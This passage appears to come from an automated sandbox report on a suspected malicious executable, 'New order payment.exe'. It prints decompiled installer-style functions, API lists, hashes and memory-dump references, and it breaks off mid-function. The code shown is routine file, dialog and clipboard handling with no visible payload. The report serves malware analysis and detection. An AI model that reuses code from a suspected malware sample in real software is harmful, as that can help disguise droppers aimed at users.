                                                                • Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                                • Instruction ID: 6b45de36f316d487aa01e9413b839baa5bb3cf32c01ac4838d60d751b980a7e6
                                                                • Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                                • Instruction Fuzzy Hash: E0C04C30619642DBD7105B31ED08B177E60EB50781F208935A506F11E0D6B4D451DD3E
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00403081, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E00403081(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                0x00403085
                                                                0x00403098
                                                                0x004030a0
                                                                0x00000000
                                                                0x004030a7
                                                                0x00000000
                                                                0x004030a9

                                                                APIs
                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,00402EDA,000000FF,00000004,00000000,00000000,00000000), ref: 00403098
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID:
                                                                • API String ID: 2738559852-0
                                                                • Opcode ID: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                                                • Instruction ID: e4cef5105026143dd13b930ce46becb45ea6c66ba88fb4286e933b642882ba15
                                                                • Opcode Fuzzy Hash: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                                                • Instruction Fuzzy Hash: F3E08631211118FBDF209E51EC00A973B9CDB04362F008032B904E5190D538DA10DBA9
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004030B3, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E004030B3(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}




                                                                0x004030c1
                                                                0x004030c7

                                                                APIs
                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00402E1C,000081E4), ref: 004030C1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: FilePointer
                                                                • String ID:
                                                                • API String ID: 973152223-0
                                                                • Opcode ID: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                                                • Instruction ID: aafe5e0ddee8b519ffd98e4e857b28c3b9165386d483fecacc2863ad1570d206
                                                                • Opcode Fuzzy Hash: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                                                • Instruction Fuzzy Hash: D6B01231544200BFDB214F00DF06F057B21B79C701F208030B340380F082712430EB1E
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004056B6, Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E004056B6(CHAR* _a4, intOrPtr _a8) {
				CHAR* _t3;
				char _t4;

				_t3 = _a4;
				while(1) {
					_t4 =  *_t3;
					if(_t4 == 0) {
						break;
					}
					if(_t4 != _a8) {
						_t3 = CharNextA(_t3); // executed
						continue;
					}
					break;
				}
				return _t3;
			}





                                                                0x004056b6
                                                                0x004056c9
                                                                0x004056c9
                                                                0x004056cd
                                                                0x00000000
                                                                0x00000000
                                                                0x004056c0
                                                                0x004056c3
                                                                0x00000000
                                                                0x004056c3
                                                                0x00000000
                                                                0x004056c0
                                                                0x004056cf

                                                                APIs
                                                                • CharNextA.USER32(?,004031E6,"C:\Users\user\Desktop\New order payment.exe" ,00409168), ref: 004056C3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: CharNext
                                                                • String ID:
                                                                • API String ID: 3213498283-0
                                                                • Opcode ID: b78f2958c7f68e19d57b7ad513a89c73604121592eb64134f43146a97932e323
                                                                • Instruction ID: b92c2b2cc925d09e3655dddfc00fa39e31e8eee3e0a1cce73cff96a1e9958276
                                                                • Opcode Fuzzy Hash: b78f2958c7f68e19d57b7ad513a89c73604121592eb64134f43146a97932e323
                                                                • Instruction Fuzzy Hash: B7C0806440C74057D611471040345777FF0AA91750F945C5EF0C963170C1357C408F3B
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Non-executed Functions

                                                                Function 00404FC2, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 96%
                                                                			E00404FC2(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				unsigned int _t93;
				int _t94;
				int _t95;
				long _t98;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423724; // 0x0
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404F56, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							__eflags = _a12 - _t154;
							if(_a12 != _t154) {
								goto L20;
							}
							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
							__eflags = _t87 - _t149;
							_a8 = _t87;
							if(_t87 <= _t149) {
								L37:
								return 0;
							}
							_t160 = CreatePopupMenu();
							AppendMenuA(_t160, _t149, 1, E00405BBA(_t149, _t154, _t160, _t149, 0xffffffe1));
							_t92 = _a16;
							__eflags = _t92 - 0xffffffff;
							if(_t92 != 0xffffffff) {
								_t150 = _t92;
								_t93 = _t92 >> 0x10;
								__eflags = _t93;
								_t94 = _t93;
							} else {
								GetWindowRect(_t154,  &_v28);
								_t150 = _v28.left;
								_t94 = _v28.top;
							}
							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
							_t162 = 1;
							__eflags = _t95 - 1;
							if(_t95 == 1) {
								_v60 = _t149;
								_v48 = 0x420538;
								_v44 = 0xfff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
									__eflags = _a4 - _t149;
									_t162 = _t162 + _t98 + 2;
								} while (_a4 != _t149);
								OpenClipboard(_t149);
								EmptyClipboard();
								_t101 = GlobalAlloc(0x42, _t162);
								_a4 = _t101;
								_t163 = GlobalLock(_t101);
								do {
									_v48 = _t163;
									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
									 *_t164 = 0xa0d;
									_t163 = _t164 + 2;
									_t149 = _t149 + 1;
									__eflags = _t149 - _a8;
								} while (_t149 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L37;
						}
						__eflags =  *0x42370c - _t149; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x423f48, 8);
							__eflags =  *0x423fcc - _t149; // 0x0
							if(__eflags == 0) {
								E00404E84( *((intOrPtr*)( *0x41fd08 + 0x34)), _t149);
							}
							E00403E2D(1);
							goto L25;
						}
						 *0x41f900 = 2;
						E00403E2D(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00403EBB(_a8, _a12, _a16);
						}
						ShowWindow( *0x423710, _t149);
						ShowWindow(_t154, 8);
						E00403E89(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423f50; // 0x771a18
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x423710 = GetDlgItem(_a4, 0x403);
				 *0x423708 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423724 = _t127;
				_v8 = _t127;
				E00403E89( *0x423710);
				 *0x423714 = E00404726(4);
				 *0x42372c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403E54(_a4);
				if(( *0x423f58 & 0x00000003) != 0) {
					ShowWindow( *0x423710, _t149);
					if(( *0x423f58 & 0x00000002) != 0) {
						 *0x423710 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403E89( *0x423708);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423f58 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}


































                                                                0x00404fcb
                                                                0x00404fd1
                                                                0x00404fda
                                                                0x00404fdd
                                                                0x0040516e
                                                                0x00405175
                                                                0x00405199
                                                                0x00405199
                                                                0x0040519f
                                                                0x004051ac
                                                                0x004051ca
                                                                0x004051ca
                                                                0x004051d1
                                                                0x00405228
                                                                0x00405228
                                                                0x0040522c
                                                                0x00000000
                                                                0x00000000
                                                                0x0040522e
                                                                0x00405231
                                                                0x00000000
                                                                0x00000000
                                                                0x0040523b
                                                                0x00405241
                                                                0x00405243
                                                                0x00405246
                                                                0x0040533f
                                                                0x00000000
                                                                0x0040533f
                                                                0x00405255
                                                                0x00405261
                                                                0x00405267
                                                                0x0040526a
                                                                0x0040526d
                                                                0x00405282
                                                                0x00405285
                                                                0x00405285
                                                                0x00405288
                                                                0x0040526f
                                                                0x00405274
                                                                0x0040527a
                                                                0x0040527d
                                                                0x0040527d
                                                                0x00405298
                                                                0x004052a0
                                                                0x004052a1
                                                                0x004052a3
                                                                0x004052ac
                                                                0x004052af
                                                                0x004052b6
                                                                0x004052bd
                                                                0x004052c5
                                                                0x004052c5
                                                                0x004052d3
                                                                0x004052d9
                                                                0x004052dc
                                                                0x004052dc
                                                                0x004052e3
                                                                0x004052e9
                                                                0x004052f2
                                                                0x004052f9
                                                                0x00405302
                                                                0x00405304
                                                                0x00405307
                                                                0x00405316
                                                                0x00405318
                                                                0x0040531e
                                                                0x0040531f
                                                                0x00405320
                                                                0x00405320
                                                                0x00405328
                                                                0x00405333
                                                                0x00405339
                                                                0x00405339
                                                                0x00000000
                                                                0x004052a3
                                                                0x004051d3
                                                                0x004051d9
                                                                0x00405209
                                                                0x0040520b
                                                                0x00405211
                                                                0x0040521c
                                                                0x0040521c
                                                                0x00405223
                                                                0x00000000
                                                                0x00405223
                                                                0x004051dd
                                                                0x004051e7
                                                                0x00000000
                                                                0x004051ae
                                                                0x004051ae
                                                                0x004051b4
                                                                0x004051ec
                                                                0x00000000
                                                                0x004051f5
                                                                0x004051bd
                                                                0x004051c2
                                                                0x004051c5
                                                                0x00000000
                                                                0x004051c5
                                                                0x004051ac
                                                                0x00404fe3
                                                                0x00404fe7
                                                                0x00404ff0
                                                                0x00404ff7
                                                                0x00404ffa
                                                                0x00404ffd
                                                                0x00405000
                                                                0x00405001
                                                                0x00405002
                                                                0x0040501b
                                                                0x0040501e
                                                                0x00405028
                                                                0x00405037
                                                                0x0040503f
                                                                0x00405047
                                                                0x0040504c
                                                                0x0040504f
                                                                0x0040505b
                                                                0x00405064
                                                                0x0040506d
                                                                0x00405090
                                                                0x00405096
                                                                0x004050a7
                                                                0x004050ac
                                                                0x004050ba
                                                                0x004050c8
                                                                0x004050c8
                                                                0x004050cd
                                                                0x004050db
                                                                0x004050db
                                                                0x004050e0
                                                                0x004050e3
                                                                0x004050e8
                                                                0x004050f4
                                                                0x004050fd
                                                                0x0040510a
                                                                0x00405119
                                                                0x0040510c
                                                                0x00405111
                                                                0x00405111
                                                                0x00405125
                                                                0x00405125
                                                                0x00405139
                                                                0x00405142
                                                                0x0040514b
                                                                0x0040515b
                                                                0x00405167
                                                                0x00405167
                                                                0x00000000

                                                                APIs
                                                                • GetDlgItem.USER32 ref: 00405021
                                                                • GetDlgItem.USER32 ref: 00405030
                                                                • GetClientRect.USER32 ref: 0040506D
                                                                • GetSystemMetrics.USER32 ref: 00405075
                                                                • SendMessageA.USER32 ref: 00405096
                                                                • SendMessageA.USER32 ref: 004050A7
                                                                • SendMessageA.USER32 ref: 004050BA
                                                                • SendMessageA.USER32 ref: 004050C8
                                                                • SendMessageA.USER32 ref: 004050DB
                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004050FD
                                                                • ShowWindow.USER32(?,00000008), ref: 00405111
                                                                • GetDlgItem.USER32 ref: 00405132
                                                                • SendMessageA.USER32 ref: 00405142
                                                                • SendMessageA.USER32 ref: 0040515B
                                                                • SendMessageA.USER32 ref: 00405167
                                                                • GetDlgItem.USER32 ref: 0040503F
                                                                  • Part of subcall function 00403E89: SendMessageA.USER32 ref: 00403E97
                                                                • GetDlgItem.USER32 ref: 00405184
                                                                • CreateThread.KERNEL32 ref: 00405192
                                                                • CloseHandle.KERNEL32(00000000), ref: 00405199
                                                                • ShowWindow.USER32(00000000), ref: 004051BD
                                                                • ShowWindow.USER32(00000000,00000008), ref: 004051C2
                                                                • ShowWindow.USER32(00000008), ref: 00405209
                                                                • SendMessageA.USER32 ref: 0040523B
                                                                • CreatePopupMenu.USER32 ref: 0040524C
                                                                • AppendMenuA.USER32 ref: 00405261
                                                                • GetWindowRect.USER32 ref: 00405274
                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405298
                                                                • SendMessageA.USER32 ref: 004052D3
                                                                • OpenClipboard.USER32(00000000), ref: 004052E3
                                                                • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 004052E9
                                                                • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004052F2
                                                                • GlobalLock.KERNEL32 ref: 004052FC
                                                                • SendMessageA.USER32 ref: 00405310
                                                                • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405328
                                                                • SetClipboardData.USER32 ref: 00405333
                                                                • CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 00405339
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                • String ID: {
                                                                • API String ID: 590372296-366298937
                                                                • Opcode ID: 2304b148e9a21fd8fd2dbd7aea04fbfc66f4e7d68f979f8d2529fbafd725d49b
                                                                • Instruction ID: 6929f331228a41c4e1f6bf5049925f100d3ed94cd800429e98060a15954be78d
                                                                • Opcode Fuzzy Hash: 2304b148e9a21fd8fd2dbd7aea04fbfc66f4e7d68f979f8d2529fbafd725d49b
                                                                • Instruction Fuzzy Hash: 6DA13AB1900208BFDB119F60DD89AAE7F79FB44355F00813AFA05BA1A0C7795E41DFA9
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004047D3, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 98%
                                                                			E004047D3(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				intOrPtr _t183;
				int _t189;
				int _t196;
				intOrPtr _t198;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				intOrPtr _t231;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				signed int _t242;
				signed int _t245;
				signed int _t247;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				signed int* _t284;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				int _t294;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				intOrPtr _t309;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;
				void* _t328;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423f68; // 0x771bc4
				_t320 = SendMessageA;
				_v8 = _t182;
				_t183 =  *0x423f50; // 0x771a18
				_t315 = 0;
				_v32 = _t280;
				_v20 = _t183 + 0x94;
				if(_a8 != 0x110) {
					L23:
					__eflags = _a8 - 0x405;
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					__eflags = _a8 - 0x4e;
					if(_a8 == 0x4e) {
						L28:
						__eflags = _a8 - 0x413;
						_v16 = _t289;
						if(_a8 == 0x413) {
							L30:
							__eflags =  *0x423f59 & 0x00000002;
							if(( *0x423f59 & 0x00000002) != 0) {
								L41:
								__eflags = _v16 - _t315;
								if(_v16 != _t315) {
									_t232 = _v16;
									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
											 *_t284 =  *_t284 & 0xffffffdf;
											__eflags =  *_t284;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							__eflags = _a8 - 0x413;
							if(_a8 == 0x413) {
								L33:
								__eflags = _a8 - 0x413;
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E00404753(_v8, _a8 != 0x413);
								__eflags = _t240 - _t315;
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									__eflags = _t289 & 0x00000010;
									if((_t289 & 0x00000010) == 0) {
										__eflags = _t289 & 0x00000040;
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
											__eflags = _t298;
										} else {
											_t300 = _t289 ^ 0x00000080;
											__eflags = _t300;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t242 =  *0x423f58; // 0x80
										_t289 = 1;
										_a8 = 0x40f;
										_t245 =  !_t242 >> 0x00000008 & 1;
										__eflags = _t245;
										_a12 = 1;
										_a16 = _t245;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						}
						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
							goto L48;
						}
						goto L30;
					} else {
						__eflags = _a8 - 0x413;
						if(_a8 != 0x413) {
							L48:
							__eflags = _a8 - 0x111;
							if(_a8 != 0x111) {
								L56:
								__eflags = _a8 - 0x200;
								if(_a8 == 0x200) {
									SendMessageA(_v8, 0x200, _t315, _t315);
								}
								__eflags = _a8 - 0x40b;
								if(_a8 == 0x40b) {
									_t220 =  *0x420514;
									__eflags = _t220 - _t315;
									if(_t220 != _t315) {
										ImageList_Destroy(_t220);
									}
									_t221 =  *0x42052c;
									__eflags = _t221 - _t315;
									if(_t221 != _t315) {
										GlobalFree(_t221);
									}
									 *0x420514 = _t315;
									 *0x42052c = _t315;
									 *0x423fa0 = _t315;
								}
								__eflags = _a8 - 0x40f;
								if(_a8 != 0x40f) {
									L86:
									__eflags = _a8 - 0x420;
									if(_a8 == 0x420) {
										__eflags =  *0x423f59 & 0x00000001;
										if(( *0x423f59 & 0x00000001) != 0) {
											__eflags = _a16 - 0x20;
											_t189 = (0 | _a16 == 0x00000020) << 3;
											__eflags = _t189;
											_t316 = _t189;
											ShowWindow(_v8, _t316);
											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
										}
									}
									goto L89;
								} else {
									E004011EF(_t289, _t315, _t315);
									__eflags = _a12 - _t315;
									if(_a12 != _t315) {
										E0040140B(8);
									}
									__eflags = _a16 - _t315;
									if(_a16 == _t315) {
										L73:
										E004011EF(_t289, _t315, _t315);
										__eflags =  *0x423f6c - _t315; // 0x3
										_v32 =  *0x42052c;
										_t196 =  *0x423f68; // 0x771bc4
										_v60 = 0xf030;
										_v16 = _t315;
										if(__eflags <= 0) {
											L84:
											InvalidateRect(_v8, _t315, 1);
											_t198 =  *0x42371c; // 0x7783bd
											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
												E0040470E(0x3ff, 0xfffffffb, E00404726(5));
											}
											goto L86;
										} else {
											_t142 = _t196 + 8; // 0x771bcc
											_t281 = _t142;
											do {
												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
												__eflags = _t202 - _t315;
												if(_t202 != _t315) {
													_t291 =  *_t281;
													_v68 = _t202;
													__eflags = _t291 & 0x00000001;
													_v72 = 8;
													if((_t291 & 0x00000001) != 0) {
														_t151 =  &(_t281[4]); // 0x771bdc
														_v72 = 9;
														_v56 = _t151;
														_t154 =  &(_t281[0]);
														 *_t154 = _t281[0] & 0x000000fe;
														__eflags =  *_t154;
													}
													__eflags = _t291 & 0x00000040;
													if((_t291 & 0x00000040) == 0) {
														_t206 = (_t291 & 0x00000001) + 1;
														__eflags = _t291 & 0x00000010;
														if((_t291 & 0x00000010) != 0) {
															_t206 = _t206 + 3;
															__eflags = _t206;
														}
													} else {
														_t206 = 3;
													}
													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
													__eflags = _t294;
													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
													SendMessageA(_v8, 0x1102, _t294, _v68);
													SendMessageA(_v8, 0x110d, _t315,  &_v72);
												}
												_v16 = _v16 + 1;
												_t281 =  &(_t281[0x106]);
												__eflags = _v16 -  *0x423f6c; // 0x3
											} while (__eflags < 0);
											goto L84;
										}
									} else {
										_t282 = E004012E2( *0x42052c);
										E00401299(_t282);
										_t217 = 0;
										_t289 = 0;
										__eflags = _t282 - _t315;
										if(_t282 <= _t315) {
											L72:
											SendMessageA(_v12, 0x14e, _t289, _t315);
											_a16 = _t282;
											_a8 = 0x420;
											goto L73;
										} else {
											goto L69;
										}
										do {
											L69:
											_t309 = _v20;
											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
												_t289 = _t289 + 1;
												__eflags = _t289;
											}
											_t217 = _t217 + 1;
											__eflags = _t217 - _t282;
										} while (_t217 < _t282);
										goto L72;
									}
								}
							}
							__eflags = _a12 - 0x3f9;
							if(_a12 != 0x3f9) {
								goto L89;
							}
							__eflags = _a12 >> 0x10 - 1;
							if(_a12 >> 0x10 != 1) {
								goto L89;
							}
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							__eflags = _t227 - 0xffffffff;
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							__eflags = _t283 - 0xffffffff;
							if(_t283 == 0xffffffff) {
								L54:
								_t283 = 0x20;
								L55:
								E00401299(_t283);
								SendMessageA(_a4, 0x420, _t315, _t283);
								_a12 = 1;
								_a16 = _t315;
								_a8 = 0x40f;
								goto L56;
							}
							_t231 = _v20;
							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
								goto L55;
							}
							goto L54;
						}
						goto L28;
					}
				} else {
					 *0x423fa0 = _a4;
					_t247 =  *0x423f6c; // 0x3
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x42052c = GlobalAlloc(0x40, _t247 << 2);
					_t250 = LoadBitmapA( *0x423f40, 0x6e);
					 *0x420520 =  *0x420520 | 0xffffffff;
					_v24 = _t250;
					 *0x420528 = SetWindowLongA(_v8, 0xfffffffc, E00404DD4);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x420514 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x420514);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
